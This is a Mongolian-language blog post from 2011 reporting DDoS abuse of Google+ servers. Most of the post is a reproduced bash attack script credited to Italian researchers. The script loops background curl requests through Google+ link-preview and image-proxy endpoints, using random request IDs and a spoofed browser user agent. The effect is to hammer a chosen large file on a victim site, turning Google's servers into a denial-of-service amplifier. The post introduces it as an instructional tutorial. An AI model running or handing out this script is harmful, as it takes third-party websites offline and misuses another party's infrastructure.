Дээш очих

DDos дайралт ашиглан Google+ сервер рүү довтолжээ.

Posted on
  • Tuesday, August 30, 2011
    • by
  • in
  • Ангилал , , , , , ,
    • Нууцлалт хамгаалалтын нэвтрэлтийг шалгадаг Италийн "AIR Sicurezza Informatica" байгууллага дэлхийн хамгийн том хайлтын систем болох Гүүглийн серверүүд рүү хакерууд DDos дайралт ашиглан ГүүглНэмэхийн серверт довтлогч програм(exploit) ажиллуулж байгаа тухай мэдээлэл хийжээ.
    Мөн өөр нэгэн нууцлал, хамгаалалтын тухай мэдээлэл бичдэг сайтанд Simone Quatrini гэгч хакер залуу Гүүглийн серверлүү DDos дайралт ашиглан хэрхэн довтлох талаар заавар хичээл маягийн юм оруулсан байна.
    Тэрээр үүндээ тухайн дайралт хийх эх кодыг хүртэл хавсаргаж өгөн, видео бичлэгээр үзүүлсэн хичээл оруулжээ.

    Заавар болон эх код:




    Эх код:
    -------------------------------------------------------------------------------------------

    1. #!/bin/bash
    3. #   Bug found by                        #
    4. #       Simone 'R00T_ATI' Quatrini      #
    5. #       Mauro 'epicfail' Gasperini      #
    6. #       Site: http://www.ihteam.net     #
    8. function start {
    9.     echo "[*] Sending `echo $2` Requests..."
    10.    
    11.     for a in `seq $2`
    12.     do
    13.         id=$((RANDOM%3999999+3000000))
    14.         nohup curl "https://plus.google.com/_/sharebox/linkpreview/?c=$url&t=1&_reqid=$id&rt=j" -k -A "Mozilla/5.0 (X11; Linux i686; rv:6.0) Gecko/20100101 Firefox/6.0" > /dev/null 2>&1 &
    15.         nohup curl "https://images2-focus-opensocial.googleusercontent.com/gadgets/proxy?url=$urlclear&container=focus" -k -A "Mozilla/5.0 (X11; Linux i686; rv:6.0) Gecko/20100101 Firefox/6.0" > /dev/null 2>&1 &
    16.     done
    18.     echo "[*] Still attacking `echo $urlclear`"
    19.     echo "[*] Sleeping for 10 Seconds"
    20.     sleep 10
    21.     start url $2 urlclear
    22. }
    24. echo ''
    25. echo '             88888888ba,    88888888ba,                  ad88888ba  '
    26. echo '    aa      88      `"8b   88      `"8b                d8"     "8b  '
    27. echo '    88      88        `8b  88        `8b               Y8,          '
    28. echo 'aaaa88aaaa  88         88  88         88   ,adPPYba,   `Y8aaaaa,    '
    29. echo '""""88""""  88         88  88         88  a8"     "8a    `"""""8b,  '
    30. echo '    88      88         8P  88         8P  8b       d8          `8b  '
    31. echo '    ""      88      .a8P   88      .a8P   "8a,   ,a8"  Y8a     a8P  '
    32. echo '            88888888Y""    88888888Y""     `"YbbdP""    "Y88888P"'
    33. echo ''
    35. if [ "$#" -lt 2 ]; then
    36.     echo "Usage: $0 <big file> <Requests>"
    37.     echo "Example: $0 http://www.site.com/very_big_file.tar.gz 1000"
    38.     echo ""
    40.     exit 0                                                                                                                                                                          
    41. fi                                                                                                                                                                                  
    42.                                                                                                                                                                                    
    43. case $2 in                                                                                                                                                                          
    44.     *[!0-9]* )  echo "$2 is not numeric" && exit 1;;                                                                                                                                
    45. esac                                                                                                                                                                                
    46.                                                                                                                                                                                    
    47. echo "Attack -->" $1                                                                                                                                                                
    48. match1=/                                                                                                                                                                            
    49. repl1=%2F                                                                                                                                                                          
    50. match2=:                                                                                                                                                                            
    51. repl2=%3A                                                                                                                                                                          
    52. url=$1                                                                                                                                                                              
    53. urlclear=$1                                                                                                                                                                        
    54.                                                                                                                                                                                    
    55. url=${url//$match1/$repl1}                                                                                                                                                          
    56. url=${url//$match2/$repl2}                                                                                                                                                          
    57.                                                                                                                                                                                    
    58. echo ""                                                                                                                                                                            
    59. echo "[*] Loop started! CTRL+C to stop"                                                                                                                                            
    60. echo ""
    62. start url $2 urlclear

      -----------------------------------------------------------------------------
    on Tuesday, August 30, 2011 at 7:53 PM
    Ангилал , , , , , ,

    0 сэтгэгдэл:

    Post a Comment

    Subscribe to: Post Comments (Atom)